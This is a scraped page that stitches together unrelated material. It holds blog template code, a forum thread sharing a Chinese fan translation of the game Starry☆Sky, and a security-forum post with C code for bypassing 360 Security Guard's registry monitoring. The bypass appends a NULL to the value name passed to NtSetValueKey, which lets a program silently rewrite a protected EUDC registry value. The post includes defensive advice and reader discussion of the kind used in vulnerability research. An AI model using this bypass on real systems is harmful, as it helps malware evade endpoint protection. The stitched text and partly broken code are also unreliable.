温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!&&|&&
LOFTER精选
网易考拉推荐
用微信&&“扫一扫”
将文章分享到朋友圈。
用易信&&“扫一扫”
将文章分享到朋友圈。
阅读(471)|
用微信&&“扫一扫”
将文章分享到朋友圈。
用易信&&“扫一扫”
将文章分享到朋友圈。
历史上的今天
loftPermalink:'',
id:'fks_',
blogTitle:'【PC】Starry☆Sky~in Autumn~ 星座彼氏-秋季篇 简体中文、攻略、全开档',
blogAbstract:'游戏日文名:Starry☆Sky~in&autumn~游戏中文名:Starry☆Sky~in&autumn~游戏类型:全年龄对象***G发售时间:日制作公司:honeybee游戏官网:
{if x.moveFrom=='wap'}
{elseif x.moveFrom=='iphone'}
{elseif x.moveFrom=='android'}
{elseif x.moveFrom=='mobile'}
${a.selfIntro|escape}{if great260}${suplement}{/if}
{list a as x}
推荐过这篇日志的人:
{list a as x}
{if !!b&&b.length>0}
他们还推荐了:
{list b as y}
转载记录:
{list d as x}
{list a as x}
{list a as x}
{list a as x}
{list a as x}
{if x_index>4}{break}{/if}
${fn2(x.publishTime,'yyyy-MM-dd HH:mm:ss')}
{list a as x}
{if !!(blogDetail.preBlogPermalink)}
{if !!(blogDetail.nextBlogPermalink)}
{list a as x}
{if defined('newslist')&&newslist.length>0}
{list newslist as x}
{if x_index>7}{break}{/if}
{list a as x}
{var first_option =}
{list x.voteDetailList as voteToOption}
{if voteToOption==1}
{if first_option==false},{/if}&&“${b[voteToOption_index]}”&&
{if (x.role!="-1") },“我是${c[x.role]}”&&{/if}
&&&&&&&&${fn1(x.voteTime)}
{if x.userName==''}{/if}
网易公司版权所有&&
{list x.l as y}
{if defined('wl')}
{list wl as x}{/list}只需一步,快速开始
查看: 9023|回复: 40
转一个乙女向游戏--&Starry☆Sky~in spring~ 星座彼氏-春季篇 简体汉化版PC版的……
本帖最后由 lala0803 于
14:49 编辑
1.jpg (210.61 KB, 下载次数: 34)
14:31 上传
“星月学园”,是坐落在乡村小高丘的全日制高校。拥有能够清楚观测星空的良好地理条件。
星月学园分为6种专业,以教育学生学习天文知识为目的。
星月学园过去是一所男校,近几年,为了让学校变得更全面,这间学校开始招收女生。
但由于地处穷乡僻壤,且教学过于专业,至今为止入学的女学生仅有主人公一人。
虽说有儿时玩伴陪伴在身边,…但周边净是男生,主人公到底会有怎样的学园生活呢!?
与拥有12星座性格特征的男孩子们相遇,共同度过的日子中,萌生出来的感情。
在浩瀚璀璨的星海的守望下,一点一滴改变的恋爱心情以及天空的模样。
在此为你送上以同一所学园为舞台,在四个季节里展开的12种形态的恋爱故事!
4.jpg (75.06 KB, 下载次数: 22)
14:31 上传
2.jpg (95.13 KB, 下载次数: 13)
14:31 上传
3.jpg (90.67 KB, 下载次数: 9)
14:31 上传
游戏日文名:Starry☆Sky~in spring~
游戏中文名:Starry☆Sky~in spring~
游戏类型:全年龄对象***G
发售时间:日
制作公司:honeybee
游戏官网:
游戏介绍:喜欢照顾人,如同2人的妈妈一样的“东月锡也”
性格急躁容易与人吵架身患疑难杂症的“七海哉太”
在2位青梅竹马的围绕下,主人公在星月学园中学习天文学。
在一年级临近尾声的某一日,主人公的另一位儿时玩伴转校而来。
他是从法国归国而来的“土萌羊”
他的出现,让几个人从小时候就开始维持下来的关系逐渐发生变化----
汉化团队: 翼之梦☆暴君阿残SS汉化组 (
汉化时间:日~日
汉化组人员名单:
监督: 魅??
程序:Lighting&&七夜真神
翻译: J家小饭 set20738 chocobo123 fly_yunni pucci
校对:魅?? set20738 chocobo123 fly_yunni pucci
润色:?莉雅.南&&凛冽的遗忘&&腐腐灯种 水??&&灵秀
修图:?冰雨
测试:moonlit626 マコト duchess 小love& &&&
打杂:沧月の心&&azljtdzh ひめdream 藤薰 冷?
E书制作:usagi
特此感谢临时被扯来友情帮忙的苏洛洛、淡月昏黄~
游客,如果您要查看本帖隐藏内容请
简体中文汉化版 下载链接:
【★汉化完整版★直接解压(编辑好注册表文件后)导入注册表信息后即可运行】
不会编辑的,请看本楼楼尾的截图教学
游客,如果您要查看本帖隐藏内容请
我放弃一切和lz私奔了
地球已经阻止不了楼主了!
地球已经阻止不了楼主了!
过来看看,好老的帖子
果从火星赶回来支持啦啦~~~
果果~~美呀~~MUA~~
我想起樱兰了呢!
腐女向的不解释
kidark2010
& & ……大姐~~~写着乙女向的~~~~是CJ乙女向噢~~推荐下载玩~~搓搓你的宅男气= =
& & 要不我发一个cj纯男向的吧= =
kidark2010
& & 这里是粉区噢亲~是粉色id的家……你发乙男向的,会被关小黑屋噢~
& && && && & (ps……hx哥~请去发点视频吧~~~~)
& & 少男向都是爱情故事,不会被小黑屋的。
ps:就不去发视频。气死你
kidark2010
& & ………………随便你啦……听说你梅汁很多~~帮忙推荐下拉~~很有爱的故事哟,12个男主任你挑= =
& && &(ps…hx哥,发视频真有奖= = )
Powered byStarry☆Sky星座彼氏春夏秋冬四季的汉化游戏_百度知道【原创】利用一个NULL绕过360注册表监控 [文字模式]
- 看雪安全论坛
查看完整版本 :
KiDebug一.测试环境
本次测试所采用的操作系统为中文版Windows XP SP3(使用360安全卫士更新了所有补丁),360安全卫士 7.8.0.1001(备用木马库),360杀毒软件2.0.0.1330(病毒库日期 03:49),计算机处于联网状态,360安全卫士、360杀毒都“已成功连接至360云安全中心”。建立了一个名为admin的管理员用户。
【注意!】本次测试都在管理员下进行。
#include &windows.h&
void main()
RegBuf[0x28] = {0};
if ( RegOpenKey(HKEY_CURRENT_USER,L&EUDC\\936&,&hKey) == ERROR_SUCCESS )
RegSetValueEx(hKey, L&SystemDefaultEUDCFont&, 0, REG_BINARY, RegBuf, 0x28);
RegCloseKey(hKey);
编译后运行,360木马防火墙提示风险“发现程序正在修改系统关键设置”,默认选择为“阻止本次操作”,点确定后HKEY_CURRENT_USER\EUDC\936下SystemDefaultEUDCFont的数据以及类型没有被修改。
考虑到RegSetValueEx是位于Advapi32.dll里面的一个函数,不够底层,在RegSetValueEx的执行过程中可能会存在干扰,于是调用ntdll.dll里面的NtSetValueKey。
#include &windows.h&
typedef struct _UNICODE_STRING {
USHORT MaximumL
} UNICODE_STRING, *PUNICODE_STRING;
typedef NTSTATUS ( __stdcall *NtSetValueKey_ ) (
KeyHandle,
IN PUNICODE_STRING ValueName,
TitleIndex,
NtSetValueKey_ NtSetValueKey = NULL;
int main()
BYTE RegBuf[0x28] = {0};
if ( RegOpenKey(HKEY_CURRENT_USER,L&EUDC\\936&,&hKey) != ERROR_SUCCESS )
return FALSE;
NtSetValueKey
= (NtSetValueKey_)GetProcAddress(GetModuleHandle(L&ntdll.dll&),&NtSetValueKey&);
if ( NtSetValueKey == NULL )
return FALSE;
WCHAR lpszName[22]
= L&SystemDefaultEUDCFont&;//21个字符
UNICODE_STRING
ValueName.Buffer
ValueName.Length
ValueName.MaximumLength
NtSetValueKey( (HANDLE)hKey, &ValueName, NULL,REG_BINARY, (BYTE *)RegBuf, 0x28 );
RegCloseKey(hKey);
编译后运行,360木马防火墙仍然提示风险“发现程序正在修改系统关键设置”,默认选择为“阻止本次操作”,点确定后HKEY_CURRENT_USER\EUDC\936下SystemDefaultEUDCFont的数据以及类型没有被修改。
对于UNICODE_STRING结构体,Length表明了字符串的长度,Buffer指向的字符串不再以NULL表示字符串的结束。回忆很久以前刚开始学习C语言时,书、老师都在强调:字符串末尾是NULL,碰到NULL就说明字符串结束了。于是灵光一闪,如果在UNICODE_STRING里面加个NULL会怎样?
#include &windows.h&
typedef struct _UNICODE_STRING {
USHORT MaximumL
} UNICODE_STRING, *PUNICODE_STRING;
typedef NTSTATUS ( __stdcall *NtSetValueKey_ ) (
KeyHandle,
IN PUNICODE_STRING ValueName,
TitleIndex,
NtSetValueKey_ NtSetValueKey = NULL;
int main()
BYTE RegBuf[0x28] = {0};
if ( RegOpenKey(HKEY_CURRENT_USER,L&EUDC\\936&,&hKey) != ERROR_SUCCESS )
return FALSE;
NtSetValueKey
= (NtSetValueKey_)GetProcAddress(GetModuleHandle(L&ntdll.dll&),&NtSetValueKey&);
if ( NtSetValueKey == NULL )
return FALSE;
WCHAR lpszName[22]
= L&SystemDefaultEUDCFont&;//21个字符
UNICODE_STRING
ValueName.Buffer
ValueName.Length
= 21 * 2 + 2;//长度+2,指明多了一个NULL,这是关键之处!
ValueName.MaximumLength
= 21 * 2 + 2;//长度+2,指明多了一个NULL
NtSetValueKey( (HANDLE)hKey, &ValueName, NULL,REG_BINARY, (BYTE *)RegBuf, 0x28 );
RegCloseKey(hKey);
上面代码的关键之处在于ValueName.Length要+2,使得UNICODE_STRING中包含一个NULL。编译后运行,360无任何提示。运行regedit.exe,可以看到HKEY_CURRENT_USER\EUDC\936下面的SystemDefaultEUDCFont数值类型为REG_BINARY,数值数据是一连串的0。
4.nt!NtSetValueKey是怎么处理的?
以ntkrnlpa.exe(5.1.)为例,在0x处开始处理UNICODE_STRING.Buffer所指向的字符串末尾的NULL,有一个NULL就将Length减2,两个就减4,碰到第一个不是NULL的字符为止。这样在传递到nt!CmSetValueKey时,UNICODE_STRING最后面就不包括NULL了,SystemDefaultEUDCFont+NULL变成了SystemDefaultEUDCFont
5.防御建议
对比要保护的数值名称时,请无视Buffer末尾的NULL!
三、参考资料
HKEY_CURRENT_USER\EUDC\936:
Nooby的POC:/discussion/5767/
英文文档http://www.security.nl/files/Bypass_UAC.pdf
UNICODE_STRING:《天书夜读:从汇编语言到Windows内核编程》P40
nt!NtSetValueKey:IDA反汇编分析或WRK
b23526不错不错,收藏之:cool:
ghban妙!精彩的文章
kgzda或者不用到是更简单些
邓韬鄙视楼主抄袭我的代码和文章
KiDebug鄙视楼主抄袭我的代码和文章
不知抄了LS哪篇?给个URL吧:3:
邓韬没事,专找你们这些高调歌的茬
孤行有你mark z...
wandev膜拜了,收藏一下
痞子辉debugman上面的应该是原作者的吧。。。
QEverdebugman上面的应该是原作者的吧。。。
:cool:LZ的文章都是pediy和debugman同步发行的~~
mumaren膜拜了,收藏一下
广海混沌呵呵 值得关注一下
AntBean写的很好。。
KiDebugdebugman上面的应该是原作者的吧。。。
从LZ的ID和头像可以判断得出:LZ一稿多投了。:cool:
starrysky/en-us/sysinternals/dd581628
KiDebug/en-us/sysinternals/dd581628
咳,亏我还在瞎猫碰上死耗子沾沾自喜,原来早就有了。。:eek:
Gall感觉你的思路不错,但是为什么我自己测试时,第一种方案,360都没有阻拦呢?
【系统】:Microsoft Windows XP Professional 版本 2002 Service Pack 3
【360杀毒】:程序版本2.0.0.1331 病毒库日期
【360安全卫士】:主程序版本7.8.0.1001 备用木马库
[#include &Windows.h&
#include &TCHAR.H&
void main()
BYTE RegBuf[0x28]={0};
if(RegOpenKey(HKEY_CURRENT_USER,_T(&EUDC\\936&),&hKey) == ERROR_SUCCESS)
RegSetValueEx(hKey,_T(&SetDefaultEUDCFont&),0,REG_BINARY,RegBuf,0x28);
RegCloseKey(hKey);
希望大家也测试一下,看看是否跟我测试的一样,如果不同,请在下面留言,大家深入研究一下....
qweee过来学习一下,感谢 分享!
benxue不错:)::)::):
KiDebug感觉你的思路不错,但是为什么我自己测试时,第一种方案,360都没有阻拦呢?
【系统】:Microsoft Windows XP Professional 版本 2002 Service Pack 3
【360杀毒】:程序版本2.0.0.1331 病毒库日期
【360安全...
因为你是设置“SetDefaultEUDCFont”,而不是“SystemDefaultEUDCFont”,所以360不拦。
在HKEY_CURRENT_USER\EUDC\936下无论新建、修改什么值,只要名称不是“SystemDefaultEUDCFont”的话都不会拦。
另外在测试的时候,需要保持联网状态。断网的话无论做什么360都不管,这很让人不解。:eek:
yy大雄LZ 哪个时候上360啊
天天帮找洞
Osleti因为你是设置“SetDefaultEUDCFont”,而不是“SystemDefaultEUDCFont”,所以360不拦。
在HKEY_CURRENT_USER\EUDC\936下无论新建、修改什么值,只要名称不是“SystemDefaultEUDCFont”的话都不会拦。
另外在测试...
那是因为断网了就没有连接到他们的云安全服务器....
毁灭呵 楼主公布后 这个方法相信也用不了多久了
yangxingyuLZ其实不应该发出来,这样不和谐
pilyuxia小技巧发挥大效应,学习学习!
幽灵娃娃程序代码编译出错求附件。
KiDebug程序代码编译出错求附件。
百度一下:vc6 unicode
